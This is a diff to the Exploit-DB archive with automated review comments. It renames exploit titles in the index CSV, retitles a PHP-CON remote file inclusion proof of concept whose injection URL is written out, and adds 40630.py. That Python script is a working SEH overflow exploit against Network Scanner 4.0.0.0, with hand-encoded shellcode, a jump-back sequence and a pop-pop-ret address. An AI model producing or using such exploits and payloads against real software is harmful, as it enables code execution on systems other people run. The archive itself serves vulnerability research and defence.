5773,platforms/php/webapps/5773.txt,"yblog 0.2.2.2 - (Cross-Site Scripting / SQL Injection) Multiple Vulnerabilities",2008-06-10,Unohope,php,webapps,0
|
||||
5774,platforms/php/webapps/5774.txt,"Insanely Simple Blog 0.5 - (index) SQL Injection",2008-06-10,Unohope,php,webapps,0
|
||||
5775,platforms/php/webapps/5775.txt,"ASPPortal Free Version (Topic_Id) - SQL Injection",2008-06-10,JosS,php,webapps,0
|
||||
5775,platforms/php/webapps/5775.txt,"ASPPortal Free Version - 'Topic_Id' SQL Injection",2008-06-10,JosS,php,webapps,0
|
||||
5776,platforms/php/webapps/5776.txt,"Experts 1.0.0 - (answer.php) SQL Injection",2008-06-10,"CWH Underground",php,webapps,0
|
||||
5777,platforms/windows/remote/5777.html,"Black Ice Software Annotation Plugin - 'BiAnno.ocx' Remote Buffer Overflow",2008-06-10,shinnai,windows,remote,0
|
||||
5778,platforms/windows/remote/5778.html,"Black Ice Software Annotation Plugin - (BiAnno.ocx) Buffer Overflow (2)",2008-06-10,shinnai,windows,remote,0
|
||||
|
@ -24760,7 +24760,7 @@ id,file,description,date,author,platform,type,port
|
|||
27602,platforms/php/webapps/27602.txt,"DotNetNuke DNNArticle Module 10.0 - SQL Injection",2013-08-15,"Sajjad Pourali",php,webapps,0
|
||||
27603,platforms/php/webapps/27603.txt,"w-CMS 2.0.1 - Remote Code Execution",2013-08-15,ICheer_No0M,php,webapps,0
|
||||
27806,platforms/windows/remote/27806.txt,"BankTown ActiveX Control 1.4.2.51817/1.5.2.50209 - Remote Buffer Overflow",2006-05-03,"Gyu Tae",windows,remote,0
|
||||
27605,platforms/php/webapps/27605.txt,"Alibaba Clone Tritanium Version (news_desc.html) - SQL Injection",2013-08-15,IRAQ_JAGUAR,php,webapps,0
|
||||
27605,platforms/php/webapps/27605.txt,"Alibaba Clone Tritanium Version - 'news_desc.html' SQL Injection",2013-08-15,IRAQ_JAGUAR,php,webapps,0
|
||||
27606,platforms/windows/remote/27606.rb,"Intrasrv 1.0 - Buffer Overflow (Metasploit)",2013-08-15,Metasploit,windows,remote,80
|
||||
27607,platforms/windows/remote/27607.rb,"MiniWeb (Build 300) - Arbitrary File Upload (Metasploit)",2013-08-15,Metasploit,windows,remote,8000
|
||||
27608,platforms/windows/remote/27608.rb,"Ultra Mini HTTPD - Stack Buffer Overflow (Metasploit)",2013-08-15,Metasploit,windows,remote,80
|
||||
|
@ -30596,7 +30596,7 @@ id,file,description,date,author,platform,type,port
|
|||
33855,platforms/linux/remote/33855.txt,"MIT Kerberos 5 - 'src/kdc/do_tgs_req.c' Ticket Renewal Double-Free Memory Corruption",2010-04-20,"Joel Johnson",linux,remote,0
|
||||
33856,platforms/php/webapps/33856.txt,"Viennabux Beta! - 'cat' Parameter SQL Injection",2010-04-09,"Easy Laster",php,webapps,0
|
||||
33858,platforms/php/webapps/33858.txt,"DBSite wb CMS - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2010-04-21,The_Exploited,php,webapps,0
|
||||
34143,platforms/windows/remote/34143.txt,"XnView 1.97.4 - MBM File Remote Heap Buffer Overflow",2010-06-14,"Mauro Olea",windows,remote,0
|
||||
34143,platforms/windows/remote/34143.txt,"XnView 1.97.4 - '.MBM' File Remote Heap Buffer Overflow",2010-06-14,"Mauro Olea",windows,remote,0
|
||||
34144,platforms/php/webapps/34144.txt,"Joomla! Component com_easygb - 'Itemid' Parameter Cross-Site Scripting",2010-06-08,"L0rd CrusAd3r",php,webapps,0
|
||||
34145,platforms/unix/dos/34145.txt,"Python 3.2 - 'audioop' Module Memory Corruption",2010-06-14,haypo,unix,dos,0
|
||||
34146,platforms/php/webapps/34146.txt,"Sell@Site PHP Online Jobs Login - Multiple SQL Injections",2010-06-15,"L0rd CrusAd3r",php,webapps,0
|
||||
|
@ -35570,7 +35570,7 @@ id,file,description,date,author,platform,type,port
|
|||
39221,platforms/win_x86-64/dos/39221.txt,"Adobe Flash - Use-After-Free When Setting Stage",2016-01-11,"Google Security Research",win_x86-64,dos,0
|
||||
39222,platforms/multiple/remote/39222.txt,"Foreman Smart-Proxy - Remote Command Injection",2014-06-05,"Lukas Zapletal",multiple,remote,0
|
||||
39223,platforms/php/webapps/39223.txt,"ZeusCart - 'prodid' Parameter SQL Injection",2014-06-24,"Kenny Mathis",php,webapps,0
|
||||
39224,platforms/hardware/remote/39224.py,"Fortigate OS Version 4.x < 5.0.7 - SSH Backdoor",2016-01-12,operator8203,hardware,remote,22
|
||||
39224,platforms/hardware/remote/39224.py,"Fortigate OS 4.x < 5.0.7 - SSH Backdoor",2016-01-12,operator8203,hardware,remote,22
|
||||
39229,platforms/linux/dos/39229.cpp,"Grassroots DICOM (GDCM) 2.6.0 and 2.6.1 - ImageRegionReader::ReadIntoBuffer Buffer Overflow",2016-01-12,"Stelios Tsampas",linux,dos,0
|
||||
39230,platforms/linux/local/39230.c,"Linux Kernel 4.3.3 - 'overlayfs' Privilege Escalation (2)",2016-01-12,halfdog,linux,local,0
|
||||
39231,platforms/asp/webapps/39231.py,"WhatsUp Gold 16.3 - Unauthenticated Remote Code Execution",2016-01-13,"Matt Buzanowski",asp,webapps,0
|
||||
|
@ -35779,7 +35779,7 @@ id,file,description,date,author,platform,type,port
|
|||
39444,platforms/windows/dos/39444.txt,"Alternate Pic View 2.150 - '.pgm' Crash (PoC)",2016-02-15,"Shantanu Khandelwal",windows,dos,0
|
||||
39445,platforms/linux/dos/39445.c,"Ntpd ntp-4.2.6p5 - ctl_putdata() Buffer Overflow",2016-02-15,"Marcin Kozlowski",linux,dos,0
|
||||
39446,platforms/win_x86/local/39446.py,"Microsoft Windows - 'afd.sys' Dangling Pointer Privilege Escalation (MS14-040)",2016-02-15,"Rick Larabee",win_x86,local,0
|
||||
39447,platforms/windows/dos/39447.py,"Network Scanner Version 4.0.0.0 - SEH Crash (PoC)",2016-02-15,INSECT.B,windows,dos,0
|
||||
39447,platforms/windows/dos/39447.py,"Network Scanner 4.0.0.0 - SEH Crash (PoC)",2016-02-15,INSECT.B,windows,dos,0
|
||||
39448,platforms/php/webapps/39448.txt,"Tiny Tiny RSS - Blind SQL Injection",2016-02-15,"Kacper Szurek",php,webapps,80
|
||||
39449,platforms/multiple/webapps/39449.txt,"ManageEngine OPutils 8.0 - Multiple Vulnerabilities",2016-02-16,"Kaustubh G. Padwad",multiple,webapps,0
|
||||
39450,platforms/multiple/webapps/39450.txt,"ManageEngine Network Configuration Management Build 11000 - Privilege Escalation",2016-02-16,"Kaustubh G. Padwad",multiple,webapps,0
|
||||
|
@ -36670,7 +36670,7 @@ id,file,description,date,author,platform,type,port
|
|||
40558,platforms/php/webapps/40558.txt,"School Full CBT 0.1 - SQL Injection",2016-10-14,lahilote,php,webapps,0
|
||||
40559,platforms/php/webapps/40559.txt,"PHP Business Directory - Multiple Vulnerabilities",2016-10-17,larrycompress,php,webapps,0
|
||||
40560,platforms/win_x86/shellcode/40560.asm,"Windows x86 - Keylogger Reverse UDP Shellcode (493 bytes)",2016-10-17,Fugu,win_x86,shellcode,0
|
||||
40561,platforms/multiple/remote/40561.rb,"Ruby on Rails - Dynamic Render File Upload Remote Code Execution",2016-10-17,Metasploit,multiple,remote,0
|
||||
40561,platforms/multiple/remote/40561.rb,"Ruby on Rails - Dynamic Render File Upload / Remote Code Execution",2016-10-17,Metasploit,multiple,remote,0
|
||||
40562,platforms/windows/local/40562.cpp,"Microsoft Windows Diagnostics Hub - DLL Load Privilege Escalation (MS16-125)",2016-10-17,"Google Security Research",windows,local,0
|
||||
40566,platforms/php/webapps/40566.py,"Pluck CMS 4.7.3 - Cross-Site Request Forgery (Add Page)",2016-10-18,"Ahsan Tahir",php,webapps,0
|
||||
40567,platforms/windows/local/40567.py,"LanSpy 2.0.0.155 - Local Buffer Overflow",2016-10-18,n30m1nd,windows,local,0
|
||||
|
@ -36725,3 +36725,4 @@ id,file,description,date,author,platform,type,port
|
|||
40627,platforms/windows/local/40627.c,"Microsoft Windows (x86) - 'NDISTAPI' Privilege Escalation (MS11-062)",2016-10-24,"Tomislav Paskalev",windows,local,0
|
||||
40628,platforms/php/webapps/40628.pl,"EC-CUBE 2.12.6 - Server-Side Request Forgery",2016-10-24,Wadeek,php,webapps,0
|
||||
40629,platforms/hardware/webapps/40629.txt,"Industrial Secure Routers EDR-810 / EDR-G902 / EDR-G903 - Insecure Configuration Management",2016-10-24,"Sniper Pex",hardware,webapps,0
|
||||
40630,platforms/windows/local/40630.py,"Network Scanner 4.0.0 - SEH Local Buffer Overflow",2016-10-25,n30m1nd,windows,local,0
|
||||
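Review bot: the added row for 40630 gives the version as "Network Scanner 4.0.0", while the retitled 39447 row for the same product reads "Network Scanner 4.0.0.0" and the header of 40630.py states "Version: 4.0.0.0". Suggest titling the new row "Network Scanner 4.0.0.0 - SEH Local Buffer Overflow" so that a search on the version string returns both entries.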
|
|
|
|
@ -1,6 +1,9 @@
|
|||
PHP-CON v1.3 (include.php)Remote File Inclusion Vulnerability
|
||||
PHP-CON 1.3 - 'include.php' Remote File Inclusion
|
||||
|
||||
Script : http://sourceforge.net/project/showfiles.php?group_id=182182
|
||||
|
||||
POC :
|
||||
|
||||
/PHP_CON/Exchange/include.php?webappcfg[APPPATH]= Evil Code
|
||||
|
||||
# milw0rm.com [2007-11-28]
|
||||
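Review bot: the retitled header still leaves the affected release stated only in the title line. The "Script :" line links the SourceForge file listing for the whole project (group_id=182182) rather than a specific release, so a reader cannot confirm which download the report applies to. Suggest adding a separate version line next to the link.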
|
|
71
platforms/windows/local/40630.py
Executable file
|
@ -0,0 +1,71 @@
|
|||
#!/usr/bin/python
|
||||
# -*- coding: utf-8 -*-
|
||||
|
||||
### Network Scanner Version 4.0.0.0 - SEH Overflow Exploit by n30m1nd ###
|
||||
|
||||
# Date: 2016-10-21
|
||||
# Exploit Author: n30m1nd
|
||||
# Exploit Title: Network Scanner Version 4.0.0.0 SEH Based Exploit
|
||||
# Vendor Homepage: http://www.mitec.cz/
|
||||
# Software Link: https://www.exploit-db.com/apps/8a419b10772d811ce5eea44cb88ae55b-NetScan.zip
|
||||
# Version: 4.0.0.0
|
||||
# Tested on: Win7 64bit and Win10 64 bit
|
||||
|
||||
# Credits
|
||||
# =======
|
||||
# PoC by: INSECT.B - http://binsect00.tistory.com
|
||||
# https://www.exploit-db.com/exploits/39447/
|
||||
# Shouts to the crew at Offensive Security for their huge efforts on making the infosec community better
|
||||
|
||||
# How to
|
||||
# ======
|
||||
# * Run this python script. It will generate an "exploit.txt" file.
|
||||
# * Copy the contents and, in the program, go to the "TOOLS" tab then click on "Detect IP from hostname" and paste the contents
|
||||
# * MessageBoxA is called on an infinite loop since the exception handler is triggered all the time
|
||||
|
||||
# Exploit code
|
||||
# ============
|
||||
|
||||
import struct
|
||||
|
||||
# MessageBoxA in NetScan.exe => 004042F1
|
||||
mbox = (
|
||||
"\x25\x41\x41\x41"
|
||||
"\x41\x25\x32\x32"
|
||||
"\x32\x32\x50\x68"
|
||||
"\x70\x77\x6E\x64"
|
||||
"\x54\x5F\x50\x57"
|
||||
"\x57\x50\x35\x8E"
|
||||
"\x60\x60\x55\x35"
|
||||
"\x7F\x22\x20\x55"
|
||||
"\x50\xC3"
|
||||
)
|
||||
# JUMP BACK to our shellcode!
|
||||
nseh = (
|
||||
# xor al,51h; Sets the ZF = 0 (We have to be very unlucky for eax to end in 51h)
|
||||
"\x34\x51"
|
||||
# jne -32h; Jump if ZF = 0
|
||||
"\x75\xCC"
|
||||
)
|
||||
# pop pop ret => 00402E67
|
||||
sehh = struct.pack("<L", 0x00402e67)
|
||||
|
||||
payl = "A" * (76-48)
|
||||
payl+= mbox
|
||||
payl+= "A"*(48-len(mbox))
|
||||
payl+= nseh + sehh
|
||||
|
||||
with open("exploit.txt","wb") as f:
|
||||
f.write(payl[:-1])
|
||||
print payl
|
||||
|
||||
"""
|
||||
NOTE:
|
||||
The original author of this PoC stated that it was not possible to be
|
||||
exploited since all addresses inside the binary contain the null byte.
|
||||
As you can see in this exploit, the null byte is added by default at
|
||||
the end because strings are null terminated when read from an input
|
||||
box. This is why we write the payload minus 1 byte, payl[:-1], because
|
||||
we don't need to write the last null byte for the "pop pop ret" jump
|
||||
in the "sehh" variable.
|
||||
"""
|
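Review bot: the script is Python 2 only (the `print payl` statement near the end, and a `str` payload written to a file opened with "wb"), but the shebang is `#!/usr/bin/python`, which does not say which interpreter is expected. Suggest naming the interpreter version in the header comments or in the shebang. The constants in `payl = "A" * (76-48)` are also undocumented; a comment stating what 76 and 48 measure would let a reader check the layout against the NOTE at the bottom of the file.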